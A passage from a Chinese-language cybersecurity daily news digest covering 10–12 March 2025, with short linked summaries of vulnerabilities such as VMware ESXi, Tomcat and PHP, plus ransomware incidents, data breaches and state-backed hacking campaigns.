3、9.3/10分高危漏洞被紧急修复:影响 3.7 万台ESXi 服务器
https://www.ithome.com/0/836/607.htm 博通(Broadcom)旗下 VMware 本周发布安全更新,针对 VMware ESXi 服务器等产品,修复多个安全漏洞。
4、微软修复自2023年以来被利用的权限提升漏洞
https://www.csoonline.com/article/3843369/microsoft-patches-privilege-escalation-flaw-exploited-since-2023.html 在本月的安全更新中,微软修复了57个漏洞,其中包括6个已被利用或公开披露的漏洞。其中一个零日漏洞自2023年以来已被用于攻击,涉及名为PipeMagic的后门程序。
5、朝鲜黑客组织 Lazarus Group利用伪装 npm 包植入后门
https://hackread.com/lazarus-group-backdoor-fake-npm-packages-attack/ 朝鲜政府支持的黑客组织Lazarus Group 向备受全球开发者青睐的 npm 软件仓库中植入了恶意代码。网络安全研究公司 Socket Research Team 发现了六个新的虚假软件包,这些包已被下载约 330 次,旨在入侵开发者的计算机,窃取登录信息、加密货币数据,甚至安装后门以实现长期访问。
6、Ballista僵尸网络利用未修复的TP-Link漏洞感染超6000台设备
https://thehackernews.com/2025/03/ballista-botnet-exploits-unpatched-tp.html 根据Cato CTRL团队的最新发现,未修复的TP-Link Archer路由器成为名为Ballista的新型僵尸网络攻击的目标。
7、苹果发布补丁修复专门针对特定目标发起攻击的WebKit零日漏洞
https://thehackernews.com/2025/03/apple-releases-patch-for-webkit-zero.html 苹果公司于周二发布了一项安全更新,修复了一个零日漏洞。该公司表示,该漏洞已被用于“极其复杂”的攻击中。
8、瑞士NCSC要求关键基础设施遭受网络攻击后24小时内报告
https://www.freebuf.com/articles/es/424291.html 瑞士国家网络安全中心(NCSC)近日发布新规,要求关键基础设施组织在发现网络攻击后的24小时内进行报告。此举旨在应对日益严峻的网络安全威胁。
9、谷歌去年向白帽黑客支付了近1800万美元
https://www.freebuf.com/vuls/424289.html 谷歌宣布,2024年向超过600名报告漏洞的安全研究人员支付了1800万美元。自该公司的漏洞悬赏计划启动以来,累计支付的奖金已超过6500万美元。
10、微博将对未标识的“AI 谣言”及时展开治理,最高禁言至关闭账号
https://www.ithome.com/0/837/013.htm 微博方面表示,平台将结合 AI 技术能力、专项人工审核与用户举报投诉,积极识别未标识的 AI 内容,并对相应情况予以相应处置(尤其是涉社会民生、突发事件、科普医疗以及个人权益的内容)。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年03月12日
1、攻击者利用Strela窃密木马针对欧洲用户进行攻击
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/a-deep-dive-into-strela-stealer-and-how-it-targets-european-countries/ 攻击者自2022年底以来一直利用Strela窃密木马进行攻击活动,其重点目的是从Microsoft Outlook和Mozilla Thunderbird电子邮件客户端中窃取凭据。该威胁主要影响特定欧洲国家的用户,包括西班牙、意大利、德国、波兰和乌克兰等。研究人员最近发现恶意的电子邮件,攻击者转发包含发票的正常电子邮件,但将原
2、WinDbg中存在远程代码执行漏洞
https://securityonline.info/windbg-remote-code-execution-vulnerability-cve-2025-24043-exposes-critical-security-risk/ 微软的WinDbg调试器中存在一个远程代码执行漏洞,该漏洞被标识为CVE-2025-24043(CVSS评分为7.5),允许经过授权的攻击者通过网络执行恶意代码,从而可能危害受影响的系统。WinDbg中的SOS调试扩展验证加密签名的方式存在缺陷,具有网络访问权限的攻击者可以绕过身份验证机制,从而在受影响的系统上执行未经授权的远程代码。为了降低该漏洞所带来的风险
3、Dark Storm组织声称对X进行DDoS攻击
https://www.bleepingcomputer.com/news/security/x-hit-by-massive-cyberattack-amid-dark-storms-ddos-claims/ Dark Storm攻击组织声称对X(原推特)进行DDoS攻击,此次事件迫使该公司启用DDoS防护。Dark Storm是一个亲巴勒斯坦的攻击组织,成立于2023年,此前曾针对以色列、欧洲和美国的组织进行攻击。该组织在其Telegram频道上发帖称,他们对X(推特)进行了DDoS攻击。虽然埃隆·马斯克没有明确说明此次中断是由DDoS攻击引起的,但他证实这是由大规模的网络攻击造成的。
4、克利夫兰市法院因遭受网络攻击关闭两周
https://www.jdsupra.com/legalnews/cleveland-municipal-court-hit-by-cyber-3202719/ 克利夫兰市法院在过去两周因一起网络攻击事件而一直关闭。该事件的性质和影响范围尚未被公开,但有理由推测该法院可能遭受了勒索软件攻击。克利夫兰市法院负责处理低级别的刑事和民事案件,于2月22日首次注意到异常情况,并被迫关闭几乎所有业务。该法院的发言人告诉媒体,所有内部系统和软件平台都将关闭,直至另行通知。
5、因网络诈骗,美国在2024年损失了125亿美元
https://www.bleepingcomputer.com/news/security/us-govt-says-americans-lost-record-125-billion-to-fraud-in-2024/ 美国联邦贸易委员会 (FTC) 3月10日表示,去年美国人因欺诈而损失了创纪录的 125 亿美元,比上一年增加了 25%。
6、研究人员在野外发现 5000+ 恶意程序包破坏 Windows 系统
https://cybersecuritynews.com/5000-malicious-packages-found-in-the-wild/ FortiGuard Labs 最近发现了 5,000 多个旨在破坏 Windows 系统的恶意软件包。这些软件包从 2024 年 11 月开始检测到,采用复杂的技术来规避传统的安全措施,同时执行可能导致数据盗窃、未经授权的访问和完全系统入侵的有害操作。
7、SideWinder APT正针对亚洲、中东和非洲的海事、核能和 IT 行业
https://thehackernews.com/2025/03/sidewinder-apt-targets-maritime-nuclear.html 卡巴斯基发现,南亚和东南亚、中东和非洲的海事和物流公司已成为一个名为 SideWinder 的高级持续威胁 (APT) 组织的目标。
8、多个勒索软件组织使用 Ragnar Loader 来逃避检测
https://cybersecuritynews.com/ragnar-loader-employed-by-multiple-ransomware-groups/ 一种称为 Ragnar Loader 的复杂恶意软件工具包已被确定为针对性勒索软件攻击的关键组成部分。该加载程序也称为 Sardonic Backdoor,是 Monstrous Mantis 勒索软件组织(前身为 Ragnar Locker)的主要渗透机制。
9、Veritas 的严重漏洞让攻击者能够执行恶意代码
https://cybersecuritynews.com/critical-veritas-vulnerability/ Veritas Arctera InfoScale 产品线中存在一个严重安全漏洞,使企业系统面临远程代码执行 (RCE) 攻击,凸显了灾难恢复基础架构中持续存在的风险。
10、Apache Tomcat修复远程代码执行漏洞(CVE-2025-24813)
https://www.secrss.com/articles/76492 Apache发布安全公告,修复了Apache Tomcat远程代码执行漏洞(CVE-2025-24813);当应用程序启用了servlet的写入功能(默认禁用)、使用Tomcat文件会话持久和存储机制默认位置且包含反序列化利用库时,不得进行身份验证另外,当上传目标URL为公共目标URL的子目录,且攻击者知悉上传文件名称时,需验证身份验证的攻击者可获取内容目标文件信息或添加文件。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年03月11日
1、研究人员称SecP0勒索组织采用新的勒索手段
https://cybersecuritynews.com/secp0-ransomware-threatens-organizations/ 研究人员称一个新的勒索组织SecP0采用了一种新型勒索手段,为未公开的软件漏洞索要赎金。这种新型勒索策略的出现表明他们针对的是组织的网络安全漏洞,而不是数据本身。据称,该勒索组织会寻找广泛使用的应用程序或系统中的关键漏洞,此类漏洞披露可能会被其他更多攻击者所恶意利用。SecP0勒索组织似乎针对的是企业软件平台,包括像Passwordstate这样的密码管理工具。该组织声称发现了Passwordstate数据库结构中的弱加密,特别是在“Password
2、WordPress的Chaty Pro插件中存在任意文件上传漏洞
https://securityonline.info/cve-2025-26776-cvss-10-in-chaty-pro-plugin-exposes-thousands-of-wordpress-sites-to-takeover WordPress的Chaty Pro插件中存在一个严重的安全漏洞,该插件估计有18000个活跃安装,可能允许攻击者完全控制网站。研究人员在该插件中发现了一个任意文件上传漏洞,该漏洞被标识为CVE-2025-26776(CVSS评分为10),表明其严重程度极高。该漏洞源于插件负责处理用户输入的代码中缺乏适当的授权和安全检查。攻击者可以通过执行一系列HTTP
3、Funksec勒索组织声称攻击了巴黎索邦大学
https://cybernews.com/news/sorbonne-university-paris-claim-funksec-ai-ransomware-attack/ Funksec勒索组织声称攻击了巴黎索邦大学。该组织在他们的暗网泄露网站上将这所大学列为受害者,并声称已从其服务器中窃取了20GB的文件。尽管Funksec尚未列出赎金价格,但该组织给该大学大约12天的时间来支付未公开的赎金要求。Funksec尚未列出窃取数据的数据类型,该组织发布的帖子附带了一个截图,显示Funksec似乎远程使用该校的一台计算机设备。索邦大学暂未对此次事件进行回应。
4、日本电信巨头NTT遭遇数据泄露,波及1.8万家企业
https://www.freebuf.com/articles/database/424035.html 2月5日,NTT安全团队在其“订单信息分发系统”中检测到可疑活动,并立即限制了对设备A的访问。根据公司发布的数据泄露通知,2月5日NTT通信公司(NTT Com)发现其设施遭到了非法访问,并于2月6日确认部分信息可能已经泄露(以下简称“事件”)。公司表示:“通过内部调查,我们发现存储在内部系统(即订单信息分发系统*1)中的部分企业客户服务信息可能已经外泄。请注意,个人客户的服务信息未包含在内。”进一步调查显示,2月15日还发现了另一台设备的未授权访问,该公司随后封锁了该设备。调查结果显
5、研究人员揭露新型多态攻击,克隆浏览器扩展窃取凭证
https://thehackernews.com/2025/03/researchers-expose-new-polymorphic.html 网络安全研究人员展示了一种新型技术,允许恶意浏览器扩展程序冒充任何已安装的插件。“多态性扩展程序会创建与目标图标、HTML 弹窗、工作流程完全相同的复制品,并且还会暂时禁用合法的扩展程序,使受害者相信他们正在向真正的扩展程序提供凭据,”SquareX 在上周发布的一份报告中说。
6、新型Chirp 工具使用音频音调在设备之间传输数据
https://www.bleepingcomputer.com/news/software/new-chirp-tool-uses-audio-tones-to-transfer-data-between-devices 一个名为'Chirp'的新开源工具通过不同的音频音调在计算机(和智能手机)之间传输数据,例如文本消息。该工具由网络安全研究员 solst/ICE 开发,将每个字符映射到特定的音频频率,并实时可视化播放。
7、PHP 关键漏洞已被威胁行为者大规模利用
https://www.securityweek.com/mass-exploitation-of-critical-php-vulnerability-begins/ 威胁情报公司 GreyNoise 警告称,威胁行为者已经开始利用 PHP 中的一个关键漏洞进行大规模攻击,该漏洞可能允许攻击者在易受攻击的服务器上执行远程代码。该漏洞被追踪为 CVE-2024-4577(CVSS 得分为 9.8),如果 Windows 服务器使用 Apache 和 PHP-CGI,并且配置为使用某些代码页,则可以通过注入远程参数并执行任意代码来利用此漏洞。
8、Cobalt Strike 滥用在过去两年中减少了 80%
https://www.securityweek.com/cobalt-strike-abuse-dropped-80-in-two-years/ 根据 Fortra 的说法,过去两年中使用 Cobalt Strike 进行恶意活动的情况显著减少。2023 年 4 月,Fortra 宣布与微软和健康信息共享与分析中心(Health-ISAC)合作,采取法律和技术措施,以防止 Cobalt Strike 的滥用。2024 年 7 月,欧洲刑警组织宣布关闭了近 600 个与网络犯罪活动相关的 Cobalt Strike 服务器。现在,在宣布与微软和 Health-ISAC 合作近两年后,Fort
9、美国海军将零信任架构扩展至武器系统和OT设施
https://www.secrss.com/articles/76418 2025年2月,美国海军宣布将在未来几周内发布新的零信任实施标准,并计划将其零信任架构扩展至武器系统和操作技术(OT)领域。这项举措是海军“工业控制系统态势感知增强计划”(MOSAICS)的一部分,旨在通过持续验证和动态权限管理,提升海军设施的网络防御能力。开发和展示更强大的网络防御能力。
10、VMware高危虚拟机逃逸漏洞正被积极利用
https://www.secrss.com/articles/76411 VMware虚拟机逃逸漏洞正被积极利用,据统计全球近4万台服务器存风险,其中中国、法国、美国的受影响服务器数量位列前三,中国约4400台服务器存在风险。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年03月10日
1、Desert Dexter组织针对中东和北非进行攻击活动
https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/desert-dexter-attacks-on-middle-eastern-countries 研究人员发现了一场针对中东和北非的恶意活动,该活动自2024年9月以来一直活跃。为了传播恶意软件,攻击者在社交媒体上创建虚假的新闻群组,并发布包含文件共享服务或Telegram频道链接的广告。这些链接中含有AsyncRAT恶意软件,并且该恶意软件经过修改,能够窃取加密货币钱包,并与Telegram机器人进行通信以传输窃密信息。研究人员发现埃及、利比亚、阿联酋、俄
2、流行WordPress插件GiveWP Donation中存在安全漏洞
https://cybersecuritynews.com/wordpress-plugin-vulnerability-code-execution/ GiveWP Donation插件中存在一个严重的安全漏洞,被标识为CVE-2025-0912(CVSS评分为9.8),已使众多使用该插件的WordPress网站面临未经身份验证的远程代码执行 (RCE) 攻击风险。该漏洞源于插件捐赠表单处理逻辑中对用户提供的数据处理不当。利用此漏洞,攻击者可以通过反序列化不受信任的输入来注入恶意PHP对象,利用POP链实现完整的服务器入侵。开发团队已发布插件的3.20.0版本以修复漏洞,但仍有超过30%的
3、日本电信服务提供商NTT披露一起数据泄露事件
https://www.bleepingcomputer.com/news/security/data-breach-at-japanese-telecom-giant-ntt-hits-18-000-companies/ 日本电信服务提供商NTT通信株式会社(NTT)正在通知近18000家企业客户,他们的信息在一次网络安全事件中遭到泄露。该数据泄露事件于2025年2月初被发现,但攻击者最初入侵NTT系统的确切日期尚未确定。NTT表示攻击者入侵了其订单信息分发系统,该系统包含17891家企业客户(公司)的详细信息,但没有个人客户(消费者)的数据。
4、超过一千个WordPress网站被恶意JS代码感染
https://cside.dev/blog/thousands-of-websites-hit-by-four-backdoors-in-3rd-party-javascript-attack 超过一千个WordPress网站已被第三方的恶意JavaScript代码感染,该代码注入了四个独立的后门。后门1会上传并安装名为“Ultra SEO Processor”的虚假插件,然后用于执行攻击者发布的命令;后门2会将恶意JavaScript注入wp-config.php文件;后门3会将攻击者控制的SSH密钥添加到~/.ssh/authorized_keys文件中,以便攻击者对机器进行持久的远程
5、与Medusa勒索软件相关的攻击活动持续增加
https://www.security.com/threat-intelligence/medusa-ransomware-attacks Medusa勒索软件由研究人员追踪的一个名为“Spearwing”的组织以勒索软件即服务(RaaS)的形式运营。与大多数勒索软件的运营者一样,Spearwing组织及其附属组织进行双重勒索攻击,在对文件进行加密前窃取受害者的数据,以迫使受害者支付赎金。如果受害者拒绝付款,该组织就会威胁公开其窃取的数据。研究人员发现,Medusa勒索软件攻击活动在2023年至2024年间增长了42%。这种活动增长仍在升级,2025年1月和2月观察到的Medusa勒索攻击
6、麒麟勒索软件团伙宣称入侵乌克兰外交部
https://securityaffairs.com/175025/cyber-crime/qilin-ransomware-ministry-of-foreign-affairs-of-ukraine.html 麒麟(Qilin)勒索软件团伙近日宣称成功入侵乌克兰外交部,并窃取了敏感数据。这一事件标志着针对乌克兰的重大网络安全攻击。
7、塔塔科技遭勒索攻击,1.4TB数据被泄露
https://www.freebuf.com/articles/es/423850.html 塔塔科技(Tata Technologies)近期遭受了勒索软件组织“猎手国际”(Hunters International)的攻击。该组织声称已从这家工程公司窃取了高达 1.4TB 的数据,涉及超过 73 万份文件,并威胁若不支付赎金将公开这些数据。此次事件引发了关于勒索威胁、潜在数据泄露以及与已解散的 Hive 勒索软件团伙之间关联的讨论。
8、Sitecore 曝零日漏洞,可执行任意代码攻击
https://www.freebuf.com/vuls/423840.html 近日披露的 Sitecore 体验平台关键漏洞(CVE-2025-27218)允许未经身份验证的攻击者在未打补丁的系统上执行任意代码。该漏洞源于不安全的数据反序列化操作,影响Sitecore 体验管理器(XM)和体验平台(XP)8.2至10.4版本,这些版本在安装补丁KB1002844之前均存在风险。
9、Safe{Wallet}确认朝鲜黑客组织窃取Bybit价值50亿加密货币
https://thehackernews.com/2025/03/safewallet-confirms-north-korean.html Safe{Wallet}表示,导致 Bybit 15 亿美元加密货币劫案的网络安全事件是一起“高度复杂且由国家支持的攻击”,并称北韩威胁行为者在黑客攻击后采取措施抹去恶意活动的痕迹,以妨碍调查工作。多重签名(多重签名)平台表示,已邀请 Google Cloud Mandiant 进行取证调查,称此次攻击是由一个名为 TraderTraitor 的黑客组织所为,该组织也被称为 Jade Sleet、PUKCHONG 和 UNC4899。
10、微软警告全球超过 100 万台设备受到恶意广告活动感染
https://thehackernews.com/2025/03/microsoft-warns-of-malvertising.html 微软披露了一项大规模的恶意广告活动的细节,据估计,该活动影响了全球超过一百万台设备,微软称这是一次利用机会窃取敏感信息的攻击。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页
蚁景网安学院火热招生中,限时领取大额优惠券,快来抢购吧~
扫码咨询客服了解招生最新内容和活动

